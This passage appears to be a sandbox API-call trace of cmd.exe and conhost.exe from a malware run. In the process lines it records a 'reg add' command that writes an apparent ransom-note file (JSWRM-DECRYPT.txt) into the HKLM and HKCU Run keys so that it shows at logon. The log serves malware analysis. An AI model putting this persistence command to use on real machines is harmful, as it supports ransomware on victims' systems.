GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xe1f678, cchData=32 | out: lpLCData="Sat") returned 4 [0049.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xe1f638, cchData=32 | out: lpLCData="Sun") returned 4 [0049.851] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xe1f80c, cchData=8 | out: lpLCData=".") returned 2 [0049.851] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xe1f7f8, cchData=8 | out: lpLCData=",") returned 2 [0049.851] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0049.853] GetProcessHeap () returned 0x740000 [0049.853] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20c) returned 0x747998 [0049.853] GetConsoleTitleW (in: lpConsoleTitle=0x747998, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0049.930] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0049.931] GetProcAddress (hModule=0x75e90000, lpProcName="CopyFileExW") returned 0x75ea4330 [0049.931] GetProcAddress (hModule=0x75e90000, lpProcName="IsDebuggerPresent") returned 0x75ea5930 [0049.931] GetProcAddress (hModule=0x75e90000, lpProcName="SetConsoleInputExeNameW") returned 0x74fe09d0 [0049.931] ??_V@YAXPAX@Z () returned 0x1 [0049.932] GetProcessHeap () returned 0x740000 [0049.932] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x400a) returned 0x748e38 [0049.932] GetProcessHeap () returned 0x740000 [0049.932] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x748e38) returned 1 [0049.932] _wcsicmp (_String1="reg", _String2=")") returned 73 [0049.932] _wcsicmp (_String1="FOR", _String2="reg") returned -12 [0049.932] _wcsicmp (_String1="FOR/?", _String2="reg") returned -12 [0049.932] _wcsicmp (_String1="IF", _String2="reg") returned -9 [0049.932] _wcsicmp (_String1="IF/?", _String2="reg") returned -9 [0049.932] _wcsicmp (_String1="REM", _String2="reg") returned 6 [0049.932] _wcsicmp (_String1="REM/?", _String2="reg") returned 6 [0049.932] GetProcessHeap () returned 0x740000 [0049.932] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x58) returned 0x747bb0 [0049.932] GetProcessHeap () returned 0x740000 [0049.932] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x10) returned 0x747c10 [0049.934] GetProcessHeap () returned 0x740000 [0049.934] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xe4) returned 0x747c28 [0049.935] GetConsoleTitleW (in: lpConsoleTitle=0x4ff4c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0049.950] malloc (_Size=0xffce) returned 0x952688 [0049.951] ??_V@YAXPAX@Z () returned 0x4ff24c [0049.951] malloc (_Size=0xffce) returned 0x962660 [0049.951] ??_V@YAXPAX@Z () returned 0x4ff004 [0049.976] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0049.976] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0049.976] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0049.976] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0049.976] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0049.976] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0049.976] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0049.976] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0049.976] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0049.976] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0049.976] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0049.977] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0049.977] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0049.977] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0049.977] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0049.977] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0049.977] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0049.977] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0049.977] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0049.977] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0049.977] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0049.977] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0049.977] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0049.977] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0049.977] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0049.977] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0049.977] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0049.977] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0049.977] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0049.977] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0049.977] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0049.977] _wcsicmp (_String1="reg", _String2="START") returned -1 [0049.977] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0049.977] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0049.977] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0049.977] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0049.977] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0049.977] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0049.977] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0049.977] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0049.977] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0049.977] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0049.977] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0049.977] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0049.977] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0049.977] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0049.977] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0049.977] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0049.977] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0049.978] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0049.978] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0049.978] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0049.978] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0049.978] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0049.978] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0049.978] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0049.978] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0049.978] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0049.978] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0049.978] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0049.978] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0049.978] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0049.978] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0049.978] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0049.978] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0049.978] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0049.978] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0049.978] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0049.978] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0049.978] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0049.978] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0049.978] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0049.978] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0049.978] _wcsicmp (_String1="reg", _String2="START") returned -1 [0049.978] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0049.978] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0049.978] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0049.978] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0049.978] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0049.978] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0049.978] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0049.978] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0049.978] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0049.978] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0049.978] _wcsicmp (_String1="reg", _String2="FOR") returned 12 [0049.979] _wcsicmp (_String1="reg", _String2="IF") returned 9 [0049.979] _wcsicmp (_String1="reg", _String2="REM") returned -6 [0049.979] ??_V@YAXPAX@Z () returned 0x1 [0049.979] GetProcessHeap () returned 0x740000 [0049.979] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xffd6) returned 0x748e38 [0049.980] GetProcessHeap () returned 0x740000 [0049.980] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xec) returned 0x747d18 [0049.980] _wcsnicmp (_String1="reg", _String2="cmd ", _MaxCount=0x4) returned 15 [0049.980] malloc (_Size=0xffce) returned 0x962660 [0049.980] ??_V@YAXPAX@Z () returned 0x4fed84 [0049.980] GetProcessHeap () returned 0x740000 [0049.980] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x1ffa4) returned 0x758e18 [0050.013] SetErrorMode (uMode=0x0) returned 0x0 [0050.013] SetErrorMode (uMode=0x1) returned 0x0 [0050.013] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x758e20, lpFilePart=0x4feda4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x4feda4*="Desktop") returned 0x17 [0050.013] SetErrorMode (uMode=0x0) returned 0x1 [0050.013] GetProcessHeap () returned 0x740000 [0050.013] RtlReAllocateHeap (Heap=0x740000, Flags=0x0, Ptr=0x758e18, Size=0x40) returned 0x758e18 [0050.013] GetProcessHeap () returned 0x740000 [0050.013] RtlSizeHeap (HeapHandle=0x740000, Flags=0x0, MemoryPointer=0x758e18) returned 0x40 [0050.014] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0050.014] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0050.015] GetProcessHeap () returned 0x740000 [0050.015] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x1b4) returned 0x747e10 [0050.015] GetProcessHeap () returned 0x740000 [0050.015] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x360) returned 0x740ae0 [0050.023] GetProcessHeap () returned 0x740000 [0050.023] RtlReAllocateHeap (Heap=0x740000, Flags=0x0, Ptr=0x740ae0, Size=0x1b6) returned 0x740ae0 [0050.023] GetProcessHeap () returned 0x740000 [0050.023] RtlSizeHeap (HeapHandle=0x740000, Flags=0x0, MemoryPointer=0x740ae0) returned 0x1b6 [0050.023] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0050.023] GetProcessHeap () returned 0x740000 [0050.023] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xe0) returned 0x747fd0 [0050.025] GetProcessHeap () returned 0x740000 [0050.025] RtlReAllocateHeap (Heap=0x740000, Flags=0x0, Ptr=0x747fd0, Size=0x76) returned 0x747fd0 [0050.025] GetProcessHeap () returned 0x740000 [0050.025] RtlSizeHeap (HeapHandle=0x740000, Flags=0x0, MemoryPointer=0x747fd0) returned 0x76 [0050.025] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0050.025] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x4feb30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4feb30) returned 0xffffffff [0050.025] GetLastError () returned 0x2 [0050.025] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0050.025] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x4feb30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4feb30) returned 0xffffffff [0050.029] GetLastError () returned 0x2 [0050.029] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0050.029] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x4feb30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4feb30) returned 0x748050 [0050.029] GetProcessHeap () returned 0x740000 [0050.029] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x14) returned 0x748090 [0050.029] FindClose (in: hFindFile=0x748050 | out: hFindFile=0x748050) returned 1 [0050.029] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\reg.COM", fInfoLevelId=0x1, lpFindFileData=0x4feb30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4feb30) returned 0xffffffff [0050.029] GetLastError () returned 0x2 [0050.029] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\reg.EXE", fInfoLevelId=0x1, lpFindFileData=0x4feb30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4feb30) returned 0x748050 [0050.030] GetProcessHeap () returned 0x740000 [0050.030] RtlReAllocateHeap (Heap=0x740000, Flags=0x0, Ptr=0x748090, Size=0x4) returned 0x748090 [0050.030] FindClose (in: hFindFile=0x748050 | out: hFindFile=0x748050) returned 1 [0050.030] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0050.030] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0050.030] ??_V@YAXPAX@Z () returned 0x1 [0050.030] GetConsoleTitleW (in: lpConsoleTitle=0x4ff034, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0050.054] InitializeProcThreadAttributeList (in: lpAttributeList=0x4fef60, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4fef4c | out: lpAttributeList=0x4fef60, lpSize=0x4fef4c) returned 1 [0050.055] UpdateProcThreadAttribute (in: lpAttributeList=0x4fef60, dwFlags=0x0, Attribute=0x60001, lpValue=0x4fef48, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4fef60, lpPreviousValue=0x0) returned 1 [0050.055] GetStartupInfoW (in: lpStartupInfo=0x4fef98 | out: lpStartupInfo=0x4fef98*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0050.055] GetProcessHeap () returned 0x740000 [0050.055] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x18) returned 0x748050 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0050.055] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0050.056] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0050.056] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0050.056] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0050.056] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0050.056] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0050.056] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0050.056] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0050.056] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0050.056] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0050.056] GetProcessHeap () returned 0x740000 [0050.056] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x748050) returned 1 [0050.056] GetProcessHeap () returned 0x740000 [0050.056] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xa) returned 0x748050 [0050.056] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1 [0050.057] _get_osfhandle (_FileHandle=1) returned 0x90 [0050.057] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0050.058] _get_osfhandle (_FileHandle=0) returned 0x8c [0050.058] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0050.058] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\reg.exe", lpCommandLine="reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\JSWRM-DECRYPT.txt\" -y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x4feee8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\JSWRM-DECRYPT.txt\" -y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4fef34 | out: lpCommandLine="reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\JSWRM-DECRYPT.txt\" -y", lpProcessInformation=0x4fef34*(hProcess=0xe0, hThread=0xdc, dwProcessId=0xd60, dwThreadId=0xd10)) returned 1 [0050.254] CloseHandle (hObject=0xdc) returned 1 [0050.254] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0050.254] GetProcessHeap () returned 0x740000 [0050.254] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x746d30) returned 1 [0050.254] GetEnvironmentStringsW () returned 0x746d30* [0050.254] GetProcessHeap () returned 0x740000 [0050.254] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xb1a) returned 0x744ca8 [0050.255] FreeEnvironmentStringsA (penv="=") returned 1 [0050.255] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0050.752] GetExitCodeProcess (in: hProcess=0xe0, lpExitCode=0x4feecc | out: lpExitCode=0x4feecc*=0x1) returned 1 [0050.754] CloseHandle (hObject=0xe0) returned 1 [0050.754] _vsnwprintf (in: _Buffer=0x4fefb4, _BufferCount=0x13, _Format="%08X", _ArgList=0x4feed4 | out: _Buffer="00000001") returned 8 [0050.755] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0050.755] GetProcessHeap () returned 0x740000 [0050.755] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x744ca8) returned 1 [0050.756] GetEnvironmentStringsW () returned 0x7482f0* [0050.756] GetProcessHeap () returned 0x740000 [0050.756] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xb40) returned 0x744ca8 [0050.756] FreeEnvironmentStringsA (penv="=") returned 1 [0050.756] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0050.756] GetProcessHeap () returned 0x740000 [0050.756] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x744ca8) returned 1 [0050.756] GetEnvironmentStringsW () returned 0x7482f0* [0050.756] GetProcessHeap () returned 0x740000 [0050.756] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xb40) returned 0x744ca8 [0050.756] FreeEnvironmentStringsA (penv="=") returned 1 [0050.756] GetProcessHeap () returned 0x740000 [0050.756] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x748050) returned 1 [0050.756] DeleteProcThreadAttributeList (in: lpAttributeList=0x4fef60 | out: lpAttributeList=0x4fef60) [0050.756] ??_V@YAXPAX@Z () returned 0x1 [0050.756] _get_osfhandle (_FileHandle=1) returned 0x90 [0050.756] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0050.797] _get_osfhandle (_FileHandle=1) returned 0x90 [0050.797] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xe23890 | out: lpMode=0xe23890) returned 1 [0050.883] _get_osfhandle (_FileHandle=1) returned 0x90 [0050.883] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0050.997] _get_osfhandle (_FileHandle=0) returned 0x8c [0050.997] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xe23894 | out: lpMode=0xe23894) returned 1 [0051.088] _get_osfhandle (_FileHandle=0) returned 0x8c [0051.088] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0051.165] SetConsoleInputExeNameW () returned 0x1 [0051.165] GetConsoleOutputCP () returned 0x1b5 [0051.293] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe23850 | out: lpCPInfo=0xe23850) returned 1 [0051.293] SetThreadUILanguage (LangId=0x0) returned 0x260409 [0051.535] exit (_Code=1) [0051.535] ??_V@YAXPAX@Z () returned 0x1 Thread: id = 27 os_tid = 0xcfc Process: id = "4" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x5b8a000" os_pid = "0xce0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x3fc" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 22 os_tid = 0xe60 Thread: id = 23 os_tid = 0xa5c Thread: id = 24 os_tid = 0xe98 Thread: id = 25 os_tid = 0x770 Thread: id = 26 os_tid = 0x9d8 Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6dd7000" os_pid = "0xd04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb08" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\JSWRM-DECRYPT.txt\" -y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 28 os_tid = 0xce8 [0050.585] GetModuleHandleA (lpModuleName=0x0) returned 0xdf0000 [0050.585] __set_app_type (_Type=0x1) [0050.585] __p__fmode () returned 0x77ae3c14 [0050.585] __p__commode () returned 0x77ae49ec [0050.585] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe06fd0) returned 0x0 [0050.585] __getmainargs (in: _Argc=0xe1d1a4, _Argv=0xe1d1a8, _Env=0xe1d1ac, _DoWildCard=0, _StartInfo=0xe1d1b8 | out: _Argc=0xe1d1a4, _Argv=0xe1d1a8, _Env=0xe1d1ac) returned 0 [0050.585] _onexit (_Func=0xe08030) returned 0xe08030 [0050.586] _onexit (_Func=0xe08040) returned 0xe08040 [0050.586] _onexit (_Func=0xe08050) returned 0xe08050 [0050.586] _onexit (_Func=0xe08060) returned 0xe08060 [0050.586] _onexit (_Func=0xe08070) returned 0xe08070 [0050.586] _onexit (_Func=0xe08080) returned 0xe08080 [0050.586] GetCurrentThreadId () returned 0xce8 [0050.586] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xce8) returned 0xbc [0050.587] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0050.587] GetProcAddress (hModule=0x75e90000, lpProcName="SetThreadUILanguage") returned 0x75ea4f70 [0050.587] SetThreadUILanguage (LangId=0x0) returned 0x210409 [0050.596] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0050.596] RegOpenKeyExW (in: hKey=0x80000001, 